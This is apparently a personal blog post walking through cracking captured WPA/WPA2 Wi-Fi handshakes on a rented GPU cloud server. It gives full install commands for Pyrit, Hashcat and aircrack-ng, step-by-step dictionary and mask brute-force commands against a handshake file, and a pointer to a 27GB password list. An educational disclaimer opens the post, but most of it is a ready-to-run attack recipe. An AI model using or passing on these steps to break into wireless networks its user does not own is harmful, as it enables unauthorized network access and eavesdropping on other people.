DISCLAIMER: The information provided on this post is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defence attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. You implement the information given at your own risk.
In this post we are going to realise how practical it is to perform a brute force attack on a WPA or WPA2 captured handshake. A couple of years ago WPA/WPA2 considered secure but with the current power and cost of cloud computing anyone with slightest interest can setup a super fast server for brute force attempts with very cheap price (as low as $0.6 per hour!).
I am going to walk through my experiment and share the details and results with you. There are dozens of tutorials for this out there but this is just my own little experiment.
Brute forcing a WPA or WPA2 password begins with capturing the 4way handshake of the target WiFi. I am not going to go there as you can find a lot of solutions for that! I can only mention Kali toolbox which provides you the tools. So we will assume you got the WPA 4way handshake in handshake.cap file.
Nvidia, have provided an Amazon Linux AMI with NVIDIA GRID GPU drivers installed. I used a g2.8xlarge which comes with 4GRID GPU cores, 32 CPU and 60GB RAM. It cost me $2.6 per hour in Oregon region.
Once you are done with launching the instance, you SSH and install the following dependencies:
sudo yum install python-devel openssl-devel zlib-devel libpcap-devel glibc-devel gcc make
Then we get to installing the required tools. There are 2 high performance tools for brute forcing which are known as Pyrit and Hashcat. Pyrit is designed for brute forcing WPA/WPA2 hashes while Hashcat is a more general tool. The performance depends on the requirements of your environment but my personal preference is Pyrit! Both of these tools have different packages for CUDA enabled systems.
There is another tool names Scapy that provide some functionalities for WPA/WPA2 protocol. Scapy is not used here but I just described the installation.
wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/pyrit/pyrit-0.4.0.tar.gz tar xvzf pyrit-0.4.0.tar.gz cd pyrit-0.4.0 python setup.py build python setup.py install
wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/pyrit/cpyrit-cuda-0.4.0.tar.gz tar xvzf cpyrit-cuda-0.4.0.tar.gz cd cpyrit-cuda-0.4.0 vi setup.py
NVIDIA_INC_DIRS = ['/opt/nvidia/cuda/include']
python setup.py build python setup.py install ln -s /usr/local/bin/pyrit /usr/bin/pyrit pyrit benchmark
wget http://www.secdev.org/projects/scapy/files/scapy-latest.zip unzip scapy-latest.zip -d scapy cd scapy/*/ python setup.py build python setup.py install ln -s /usr/local/bin/scapy /usr/bin/scapy
To use Pyrit you have the option to import the password and ESSID and let the Pyrit run a batch against all ESSID:PASSWORD;
pyrit -i dictionary-file import_passwords pyrit eval pyrit -e 'target_essid' create_essid pyrit batch
or just run the ESSID against a list of passwords:
pyrit -r handshake.cap.cap -o clean-handshake.cap strip pyrit -r clean-handshake.cap -i dictionary-file attack_passthrough
The last thing to share is the dictionary (list of words). There are gigabytes of dictionaries out there but they might not be processed. The password for WPA/WPA2 is minimum 8 characters so Pyrit does a little processing to make the most efficient dictionary.
I am going to share a link (but again as I mention in disclaimer, I am only sharing information. You are fully responsible for how you use it.) with 3,902,508,361 unique WPA2 passwords HERE (27GB)
*If you used megatools you can do as below (make sure it is mega.co.nz and single quotation around link):
Extract it with
tar xvd dic.tar.gz
Once done you can move the password directory to this path:
And run “pyrit eval” to confirm the passwords are in use.
For using Hashcat you can install it as follow:
rpm -i http://pkgs.repoforge.org/p7zip/p7zip-9.20.1-1.el7.rf.x86_64.rpm wget http://hashcat.net/files/cudaHashcat-2.01.7z 7za x cudaHashcat-2.01.7z cd cudaHashcat-2.01 ./cudaHashcat64.bin -b -m 2500
and for converting the cap files to readable hccap you should use aircrack-ng. You can download it as follow:
yum install -y git-svn libpcap-devel sqlite-devel gcc gcc-c++ libnl-devel openssl-devel usbutils pciutils rfkill wireless-tools glibc* wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz tar xvfz aircrack-ng-1.2-rc4.tar.gz cd aircrack-ng-1.2-rc4 make make install ln -s /path_to_aircrack/aircrack-ng-1.2-rc4/src/aircrack-ng /usr/bin/aircrack-ng
Once installed you can convert the file and run hashcat:
aircrack-ng file.cap -J file.hccap /path_to_hashcat/oclHashcat64.exe -m 2500 file.hccap words.dic
You can also run a bruteforce attack with custom combinations:
/path_to_hashcat/oclHashcat64.exe -m 2500 -a3 file.hccap ?d?d?d?d?d?d?d?d
>>> ERROR: cuModuleLoad() 301
*** Just run the commands inside the hashcat directory so the resources are accessible